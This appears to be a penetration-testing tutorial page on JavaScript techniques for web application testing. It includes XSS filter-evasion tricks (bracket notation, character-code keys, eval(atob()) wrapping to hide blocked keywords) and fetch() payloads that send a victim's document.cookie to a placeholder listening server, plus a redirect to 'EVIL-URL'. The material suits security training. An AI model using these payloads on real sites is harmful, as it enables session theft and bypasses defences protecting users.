JavaScript for Penetration Testing

JavaScript is a crucial skill for web application penetration testing. This can present a challenge if you don't have a background in coding or any practical experience with JavaScript as a language. I've compiled this page - which I will update as I go - to list JavaScript concepts and payloads that are useful for penetration testing.

Please note: This page assumes some familiarity with coding concepts (such as methods and properties) and with penetration testing techniques. I will include references and links where relevant. Please let me know if I have missed anything, or if something could be better.

Bracket vs Dot Notation

In JavaScript you can access the properties of an object (including properties that hold functions) in a few ways. One way that might be familiar to you already is dot notation; for example, a common building block of XSS payloads is: document.cookie

However, if this payload doesn't work because a WAF or a blocklist matches the literal text, try bracket notation, which reads exactly the same property: document['cookie']

To take this example one step further, you can start from the global object and use bracket notation all the way down to execute the same payload: window["document"]["cookie"]. Because the keys are plain strings, they can be built at runtime (concatenation, String.fromCharCode, etc.) so that the blocked word never appears literally. In a browser, self and globalThis refer to the same global object as window, so they can stand in for it if window itself is filtered.
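The following is an added example, not code from the original page: it shows that dot notation, bracket notation, concatenated keys and keys built from character codes all read the same property, and includes a small resolver that walks a dotted path using brackets only. fakeWindow and fakeDocument are constructed stand-ins for the browser's window and document so the snippet also runs under Node.

```javascript
// Constructed stand-ins for the browser globals (assumption: in a real page
// the root would be window, self or globalThis and the cookie would be live).
const fakeDocument = { cookie: 'PHPSESSID=abc123; theme=dark' };
const fakeWindow = { document: fakeDocument };

// Build a property name from character codes so the word itself never appears
// literally in the payload text.
function hiddenKey(name) {
  return String.fromCharCode(...[...name].map(c => c.charCodeAt(0)));
}

// Walk a dotted path such as "document.cookie" from a root object using only
// bracket notation; this is what window["document"]["cookie"] does by hand.
// Returns undefined rather than throwing if any step is missing.
function resolvePath(root, path) {
  return path
    .split('.')
    .reduce((obj, key) => (obj == null ? undefined : obj[key]), root);
}

// Read the same property five different ways; every variant returns the
// identical string, so a filter that only matches "document.cookie" misses
// the other four.
function readCookieVariants(root) {
  return {
    viaDot: root.document.cookie,
    viaBrackets: root['document']['cookie'],
    viaConcat: root['doc' + 'ument']['coo' + 'kie'],
    viaCharCodes: root[hiddenKey('document')][hiddenKey('cookie')],
    viaPath: resolvePath(root, 'document.cookie'),
  };
}

// Check that the payload text itself does not contain a blocked literal.
function containsLiteral(payloadText, blockedLiteral) {
  return payloadText.includes(blockedLiteral);
}
```

In a real page replace fakeWindow with window (or self / globalThis); the resolver and the character-code key builder work unchanged.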

Fetch function

Stop trying to make fetch happen… But seriously, if you ever need to use this function here are some things to keep in mind:

It can be used to make a GET request, for example to send the victim's cookies to a server you control by placing them in the query string:

fetch('https://YOUR-LISTENING-SERVER.com/?session=' + window["document"]["cookie"])

Note that document.cookie only exposes cookies without the HttpOnly flag, so a session cookie set with HttpOnly will not appear in what arrives at your server.

It can also be used to make a POST request. The string body is sent as text/plain, which counts as a simple request, so the browser sends it without a CORS preflight; mode: 'no-cors' tells the browser you do not need to read the (cross-origin) response, so the request still goes out even though your server does not return CORS headers:

<script>
  fetch('https://YOUR-LISTENING-SERVER', {
    method: 'POST',
    mode: 'no-cors',
    body: document.cookie
  });
</script>

XSS - Bypass use case

The following payload (reproduced exactly as it was used, including the leading hyphen) was used in a training lab:

-eval(atob("BASE64-PAYLOAD"))

The Base64 payload contained a fetch() call carrying a reflected XSS payload of alert(document['cookie']). The word fetch was blocked, so the following steps allowed the payload to execute without it ever appearing in cleartext:

  1. Base64-encode the fetch command so the blocked keyword is not visible to the filter
  2. atob() - decodes the Base64 string back into the original JavaScript at runtime in the victim's browser
  3. eval() - executes the decoded string as JavaScript

Keep in mind that eval and atob are themselves common blocklist entries, so this only helps when the filter is looking for the inner command rather than the wrapper.
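The three steps above, as an added example that is not part of the original page: wrapPayload performs step 1 (encode and wrap), unwrapPayload performs step 2 the way the victim's browser would (decode the Base64 back to the original command, shown here without actually calling eval), and hitsBlocklist is a constructed stand-in for a keyword filter, used to confirm the wrapped payload no longer contains the blocked word. The payload text and the blocked words are assumptions chosen for illustration.

```javascript
// btoa only accepts Latin-1 characters, so encode to UTF-8 bytes first; this
// keeps payloads that contain non-ASCII characters intact.
function toBase64(text) {
  const bytes = new TextEncoder().encode(text);
  return btoa(String.fromCharCode(...bytes));
}

// Inverse of toBase64: atob() gives one char per byte, decode those as UTF-8.
function fromBase64(b64) {
  const bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0));
  return new TextDecoder().decode(bytes);
}

// Step 1: Base64-encode the blocked command and wrap it in eval(atob("...")).
function wrapPayload(js) {
  return 'eval(atob("' + toBase64(js) + '"))';
}

// Steps 2 and 3 from the browser's point of view: extract the Base64 from the
// wrapper and decode it. The result is what eval() would then execute.
function unwrapPayload(wrapped) {
  const m = /^eval\(atob\("([A-Za-z0-9+/]+=*)"\)\)$/.exec(wrapped);
  if (m === null) throw new Error('not an eval(atob("...")) wrapper');
  return fromBase64(m[1]);
}

// Constructed stand-in for a WAF keyword blocklist: case-insensitive
// substring match on the literal payload text.
function hitsBlocklist(payloadText, blockedWords) {
  const lower = payloadText.toLowerCase();
  return blockedWords.some(word => lower.includes(word.toLowerCase()));
}

// Assumed lab payload: the inner command uses bracket notation as on this page.
const originalPayload = 'fetch("https://YOUR-LISTENING-SERVER/?session=" + document["cookie"])';
const wrappedPayload = wrapPayload(originalPayload);
```

The Base64 alphabet is A-Z, a-z, 0-9, + and /, so a long encoded string can by chance contain a short blocked word in mixed case; if a wrapped payload still trips the filter, add a space or comment to the inner command to shift the encoding.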

location

When delivering a payload from a site you control to the 'victim site' you may not be able to load the target in an iframe (for example because it sends X-Frame-Options or a CSP frame-ancestors directive). Instead you can try the following script: location is a property rather than a method, and assigning a URL to it navigates the current window to that URL, so the visitor is redirected to the supplied address:

<script>
  location = 'EVIL-URL'
</script>